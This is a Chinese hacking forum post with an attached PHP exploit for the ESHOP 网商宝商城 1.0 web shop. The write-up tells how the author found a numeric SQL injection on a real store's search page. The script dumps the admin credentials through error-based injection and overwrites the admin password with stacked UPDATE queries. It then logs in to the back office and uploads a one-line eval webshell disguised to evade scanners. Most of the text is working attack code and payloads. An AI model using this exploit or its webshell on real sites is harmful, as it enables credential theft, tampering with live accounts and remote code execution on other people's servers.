ESHOP 网商宝商城 1.0 GetWebshell Exploit

作者:hack1990 时间:12-04-26 阅读数:574人阅读

某天起床比较晚,起来发现地上有传单。

看了下是个网店。

于是想看看用的什么程序,找了下(看html注释,css注释,文件名)。发现是ESHOP网商宝商城。

google下漏洞,发现有eshop的漏洞,测试了下,不对啊。不过还是报错了。结果发现有其他的网店系统叫ESHOP。

放了两天,然后想起来再测试一下注入。它有过滤代码,于是下载源码看了一下,结果发现过滤代码没有过滤 select 关键字。

在前台搜索处的“价格从 … 到 …”那里发现了一处数字型注入点(minPrice 参数直接拼进 SQL,不需要闭合引号)。

结合代码里找到的管理员表名和列名。然后就可以爆了。

http://xxxx.com/p_list.aspx?keyword=%&maxPrice=0&minPrice=0 and (select top 1 admin from admin)>0

// 第一个管理员的登录名

http://xxxx.com/p_list.aspx?keyword=%&maxPrice=0&minPrice=0 and (select top 1 password from admin)>0

// 第一个管理员的密码。存的是标准 MD5 散列,大家懂的。

防注入代码也没有过滤 update,所以即使 MD5 反查不出来,也可以直接 update 改掉密码。还有一点,这段过滤代码只检查了 GET 方式的参数。

进入后台后,在“产品系统 → 产品内容 → 列表图片”那里可以直接上传 aspx 文件。关于路径:直接上传 aspx 时页面不会显示保存路径,所以先上传一个 jpg 拿到路径,再上传 aspx 就 KO 了。

打完收工。

PS:检测而已,不搞破坏的。

<?php
 print_r('
 +—————————————————————————+
 ESHOP 网商宝商城 1.0 GetWebshell Exploit    By: vccjis[S.Y.C]
 Team : Www.MyClover.Org Www.InsiGht-Labs.org
 Data : 2012.4.22
 +—————————————————————————+
 '."\r\n");
 if ($argc < 3)
 {
 print_r('
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 
 Usage: php '.$argv[0].' Host Port Path
 Example:
 php '.$argv[0].' localhost 80 /
 
 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 ');
 exit();
 }
 $host = $argv[1];
 $port = $argv[2];
 $path = $argv[3];
 
 // Body sent along with the GET requests below. The server is not expected
 // to read it; it only feeds the Content-Length header SendData() builds.
 $content = "xxoo";
 // A made-up ASP.NET session id. The server will issue its own; this value
 // is here only so that every request carries a Cookie header.
 $cookie = "Cookie: ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";
 $type = "Content-Type: application/x-www-form-urlencoded";
 
 // Optional 5th argument "god": skip credential extraction and overwrite the
 // first admin row (Id=1) directly with stacked ";update ..." queries. This
 // is destructive — it changes the live admin login — and relies on the
 // application's filter not blocking "update" (as the write-up states).
 if ($argc == 5)
 {
  if ($argv[4] == "god")
  {
   echo "update adminname and password\n\r";
   // First back the original credentials up into real_name: "%2b" is "+",
   // i.e. real_name = admin + password (SQL string concatenation).
   $url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20real_name=admin%2bpassword%20where%20Id=1; HTTP/1.1';
   $recvdata = SendData($host, $port, $url, $content, $cookie, $type);
   // Then set admin = 0x61646D696E ("admin") and password = the hex-encoded
   // MD5 of "123456" (see the echo below). Hex literals avoid putting any
   // quote characters into the injected query.
   $url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20admin=0x61646D696E,password=0x6531306164633339343962613539616262653536653035376632306638383365%20where%20Id=1; HTTP/1.1';
   $recvdata = SendData($host, $port, $url, $content, $cookie, $type);
   echo "!!!\r\n";
   echo "go /manager the get webshell\r\n";
   echo "the product content》add a list of pictures》to upload the aspx file\r\n";
   // NOTE(review): nothing restores the account in this mode; the operator
   // has to copy the value saved in real_name back by hand.
   echo "it is necessary the original account password recovery, account password in the admin table real_name field.\r\n";
   echo "adminname:admin\r\n";
   echo "password:123456\r\n";
   exit();
  }
 }

 // Step 1: read the first admin login name out of the database. The
 // injected "and (select top 1 admin from admin)>0" compares a string
 // column with an integer; the write-up relies on the resulting database
 // error page echoing the value back inside single quotes (error-based
 // extraction, "爆" in the write-up).
 $url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0%20and%20(select%20top%201%20admin%20from%20admin)%3E0 HTTP/1.1';
 $recvdata = SendData($host, $port, $url, $content, $cookie, $type);
 $tempdata = "";

 // NOTE(review): the pattern is greedy — if the matching response line
 // holds more than one quoted string this captures from the first quote
 // to the last one, not just the admin name.
 if (preg_match("/\'.*\'/", $recvdata, $tempdata) == 0)
 {
  echo "\r\nget adminname error";
  exit(); 
 }
 $adminname = str_replace('\'', '', $tempdata[0]);

 
 // Step 2: same trick for the password column (a plain MD5 hash according
 // to the write-up). There is no error check here: on a miss $tempdata[0]
 // is undefined and $password ends up empty.
 $url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0%20and%20(select%20top%201%20password%20from%20admin)%3E0 HTTP/1.1';
 $recvdata = SendData($host, $port, $url, $content, $cookie, $type);
 $tempdata = "";
 preg_match("/\'.*\'/", $recvdata, $tempdata);
 $password = str_replace('\'', '', $tempdata[0]);
 
 echo "adminname:".$adminname."\r\n";
 echo "adminpass:".$password."\r\n";

 // Hex-encode both values so they can be used as quote-free 0x... literals.
 $hexadminname = SetToHexString($adminname);
 $hexpassword = SetToHexString($password);
 
 // Step 3 (destructive): overwrite that admin's password with the MD5 of
 // "123456" (the hex literal) so the script can log in. The original hash
 // ($hexpassword) is only written back at the very end of the script — if
 // the script dies before that, the account stays changed.
 $url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20password=0x6531306164633339343962613539616262653536653035376632306638383365%20where%20admin=0x'.$hexadminname.'; HTTP/1.1';
 SendData($host, $port, $url, $content, $cookie, $type);

 // Step 4: fetch the back-office login form to harvest the ASP.NET
 // __VIEWSTATE and __EVENTVALIDATION hidden fields that the POST must echo.
 $url = "GET ".$path."/back-login.aspx HTTP/1.1";
 $recvdata = SendData($host, $port, $url, $content, $cookie, $type);
 $tempdata = "";
 $VIEWSTATE = "";
 $EVENTVALIDATION = "";
 
 if (preg_match("/__VIEWSTATE\" va.*\" \/>/", $recvdata, $tempdata) == 0)
 {
  echo "\r\nlogin error";
  exit();
 }
 // The hidden-field value begins with "/" (base64 "/wE..."): take from that
 // slash up to the closing quote, then strip the quote.
 preg_match("/\/.*\"/", $tempdata[0],  $VIEWSTATE);
 $VIEWSTATE[0] = str_replace('"', '', $VIEWSTATE[0]);
 
 $tempdata = "";
 preg_match("/__EVENTVALIDATION\" va.*\" \/>/", $recvdata, $tempdata);
 preg_match("/\/.*\"/", $tempdata[0],  $EVENTVALIDATION);
 $EVENTVALIDATION[0] = str_replace('"', '', $EVENTVALIDATION[0]);

 // NOTE(review): "$tempdate" is a typo for $tempdata, and the session id
 // captured by the next preg_match() is never used — the line after it
 // hard-codes the fake cookie again.
 $tempdate = "";
 preg_match("/ASP.NET_SessionId.*;/", $recvdata, $tempdata);
 $cookie = "Cookie: ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";
 
 // NOTE(review): dead assignment, immediately overwritten below (and it
 // carries a stray "&&" plus a fixed user name "admin"). Only the second
 // $content is ever sent.
 $content = "__VIEWSTATE=".urlencode($VIEWSTATE[0])."&&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=".urlencode($EVENTVALIDATION[0])."&txtUserName=admin&txtPassword=123456&button=%C2%A0%C2%A0\r\n";
 // Log in as the extracted admin name with the password set in step 3.
 $content = "__VIEWSTATE=".urlencode($VIEWSTATE[0])."&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=".urlencode($EVENTVALIDATION[0])."&txtUserName=".$adminname."&txtPassword=123456&button=%C2%A0dfg%C2%A0\r\n\r\n";
 $url = "POST ".$path."/back-login.aspx HTTP/1.1";
 $recvdata = SendData($host, $port, $url, $content, $cookie, $type);

 $tempdata = "";
 // A successful login is recognised by a Set-Cookie header in the response;
 // this pattern matches its "Cookie: name=value;" tail (the "Cookie:"
 // substring of "Set-Cookie:"). Anything else is treated as a failed login.
 if (preg_match("/Cookie:.*;/", $recvdata, $tempdata) == 0)
 {
  echo "\r\nlogin error";
  exit();
 }
 
 // Reuse the captured auth cookie, plus the fake session id, for /manager.
 $cookie = $tempdata[0]." ASP.NET_SessionId=ovsnh045kuxv3s45lvmbbi55";
 // Step 5: load the product editor in the back office to harvest a fresh
 // __VIEWSTATE / __EVENTVALIDATION pair for the upload form.
 $recvdata = SendData($host, $port, "GET ".$path."/manager/product_detail.aspx HTTP/1.1", "", $cookie, $type);
 $tempdata = "";
 $VIEWSTATE = "";
 $EVENTVALIDATION = "";
 if (preg_match("/__VIEWSTATE\" va.*\" \/>/", $recvdata, $tempdata) == 0)
 {
  echo "\r\nNo /manager";
  exit();
 }
 preg_match("/\/.*\"/", $tempdata[0],  $VIEWSTATE);
 $VIEWSTATE[0] = str_replace('"', '', $VIEWSTATE[0]);
 
 $tempdata = "";
 preg_match("/__EVENTVALIDATION\" va.*\" \/>/", $recvdata, $tempdata);
 preg_match("/\/.*\"/", $tempdata[0],  $EVENTVALIDATION);
 $EVENTVALIDATION[0] = str_replace('"', '', $EVENTVALIDATION[0]);
  
 // Step 6: hand-built multipart/form-data body for the "list picture"
 // upload field (fuUploadList). Each part delimiter is "--" + boundary,
 // hence twelve leading dashes here versus ten in the Content-Type header.
 // The uploaded "asd.aspx" is a one-line JScript page that eval()s the
 // "fun" request parameter — that is the webshell. The '."@".' splice only
 // breaks the "<%@" token inside this PHP source (presumably to dodge naive
 // signature scanners); the file written on the server contains "<%@".
 // All other form fields are left empty or at their defaults; the request
 // exists purely for the upload. Field names such as "ctl00$..." sit in a
 // single-quoted string, so PHP does not interpolate them.
 $content = '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTTARGET"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTARGUMENT"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__LASTFOCUS"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__VIEWSTATE"

';
 $content .= $VIEWSTATE[0]."\r\n";
 $content .= '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="__EVENTVALIDATION"

';
 $content .= $EVENTVALIDATION[0]."\r\n"; // the __EVENTVALIDATION harvested above (a stale sample value used to be pasted here as a comment)
 $content .= '------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtProductName"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtOrderBy"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtStock"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSaleNumber"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlSecondCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlThirdCategory"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$ddlBrand"

0
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsShow"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsComment"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$chkIsNew"

on
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtPrice"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSalePrice"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtIntegral"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$hiddenImage"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$hiddenImageId"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuUploadList"; filename="asd.aspx"
Content-Type: application/octet-stream

<%'."@".' Page Language="Jscript"%><%eval(Request.Item["fun"],"unsafe");%>
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$btnUploadList"

......
------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuDetailImage"; filename=""


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$fuDetailZoomImage"; filename=""


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtKeywords"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtSummary"


------------EwwmsGcmNCcEdWawAUBSNx
Content-Disposition: form-data; name="ctl00$ContentPlaceHolder1$txtContent"


------------EwwmsGcmNCcEdWawAUBSNx--';
 
 // Header boundary (ten dashes); the body delimiters above add the "--".
 $type = "Content-Type: multipart/form-data; boundary=----------EwwmsGcmNCcEdWawAUBSNx";
 $recvdata = SendData($host, $port, "POST ".$path."/manager/product_detail.aspx HTTP/1.1", $content, $cookie, $type);
 $tempdata = "";
 // The response is expected to echo the stored path of the uploaded file.
 // NOTE(review): no check that this matched; $tempdata[0] is undefined on a miss.
 preg_match("/upload-file\/images\/product.*\.aspx/", $recvdata, $tempdata);
 // Step 7: put the original password hash back (undo step 3).
 // NOTE(review): this GET still carries the multipart $content/$type from
 // the upload; presumably the server ignores the body, but it is wasteful
 // and the restore is not verified.
 $url = 'GET '.$path.'/p_list.aspx?keyword=%&maxPrice=0&minPrice=0;update%20admin%20set%20password=0x'.$hexpassword.'%20where%20admin=0x'.$hexadminname.'; HTTP/1.1';
 SendData($host, $port, $url, $content, $cookie, $type);
 
 // NOTE(review): the printed URL ignores $port and $path, so it is only
 // correct for port 80 with Path "/".
 echo "\r\nwebshell:http://$host/".$tempdata[0]."\r\n";
 
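/**
 * Send one raw HTTP/1.1 request over a plain TCP socket and return the
 * complete response (status line, headers and body) as one string.
 *
 * @param string     $host     target host; also used verbatim in the Host and
 *                             Referer headers (the port is not appended)
 * @param int|string $port     TCP port to connect to
 * @param string     $url      the full request line, e.g. "GET /x HTTP/1.1"
 * @param string     $content  request body, sent even for GET; Content-Length
 *                             is derived from its byte length
 * @param string     $cookie   a complete "Cookie: ..." header line
 * @param string     $type     a complete "Content-Type: ..." header line
 * @return string              raw response, or "" when the connection fails
 *                             (callers already treat a non-matching response
 *                             as an error and exit)
 */
function SendData($host, $port, $url, $content, $cookie, $type)
{
 $data  = $url."\r\n";
 $data .= "Referer: http://$host/\r\n";
 $data .= $type."\r\n";
 $data .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
 $data .= "User-Agent: Opera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.10.229 Version/11.62\r\n";
 $data .= "Host: $host\r\n";
 $data .= "Content-Length: ".strlen($content)."\r\n";
 // Callers run preg_match() over the raw response, so the server must not
 // compress it. The original advertised "gzip, deflate", which would make
 // every pattern in the script miss against a server that honours it.
 $data .= "Accept-Encoding: identity\r\n";
 $data .= "Connection: Close\r\n";
 $data .= $cookie."\r\n\r\n";
 $data .= $content;

 $errno = 0;
 $errstr = '';
 // Bounded connect timeout so a filtered port does not hang the run.
 $ock = fsockopen($host, $port, $errno, $errstr, 10);
 if (!$ock)
 {
  // Return instead of falling through: the original went on to call
  // fwrite()/feof()/fgets() on a boolean false, which is not a stream.
  echo "No response from host\n";
  return "";
 }
 stream_set_timeout($ock, 10);
 fwrite($ock, $data);
 $recvdata = "";
 while (!feof($ock))
 {
  $line = fgets($ock, 1024);
  if ($line === false)
  {
   break; // read error or timeout: keep whatever arrived so far
  }
  $recvdata .= $line;
 }
 fclose($ock);
 return $recvdata;
}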
/**
 * Render the low nibble of $dec as a single lowercase hexadecimal digit.
 *
 * Only the value modulo 16 is used, so 26 yields "a" exactly like 10.
 * The caller (SetToHexString) passes 0..15. A negative argument keeps the
 * sign that PHP's "%" gives it and is returned as a plain decimal string
 * (e.g. "-3"), as the original did.
 *
 * @param int $dec  value whose low nibble is wanted
 * @return string   one character, "0".."9" or "a".."f"
 */
function SingleDecToHex($dec)
{
    $nibble = $dec % 16;
    if ($nibble >= 10)
    {
        // 10..15 map onto 'a'..'f'
        return chr(ord('a') + $nibble - 10);
    }
    return (string) $nibble;
}

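/**
 * Hex-encode a byte string (lowercase) so it can be spliced into SQL as a
 * quote-free 0x... literal.
 *
 * Delegates to bin2hex(), which emits exactly two lowercase digits per
 * byte — the same output as the hand-rolled nibble loop it replaces.
 *
 * @param string|null $str  bytes to encode
 * @return string|false     lowercase hex, or false when there is nothing to
 *                          encode (null or the empty string). The original
 *                          also returned false for the one-character string
 *                          "0" because it tested truthiness; that input now
 *                          encodes to "30" like any other byte.
 */
function SetToHexString($str)
{
    if ($str === null || $str === '')
    {
        return false;
    }
    return bin2hex((string) $str);
}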
?>
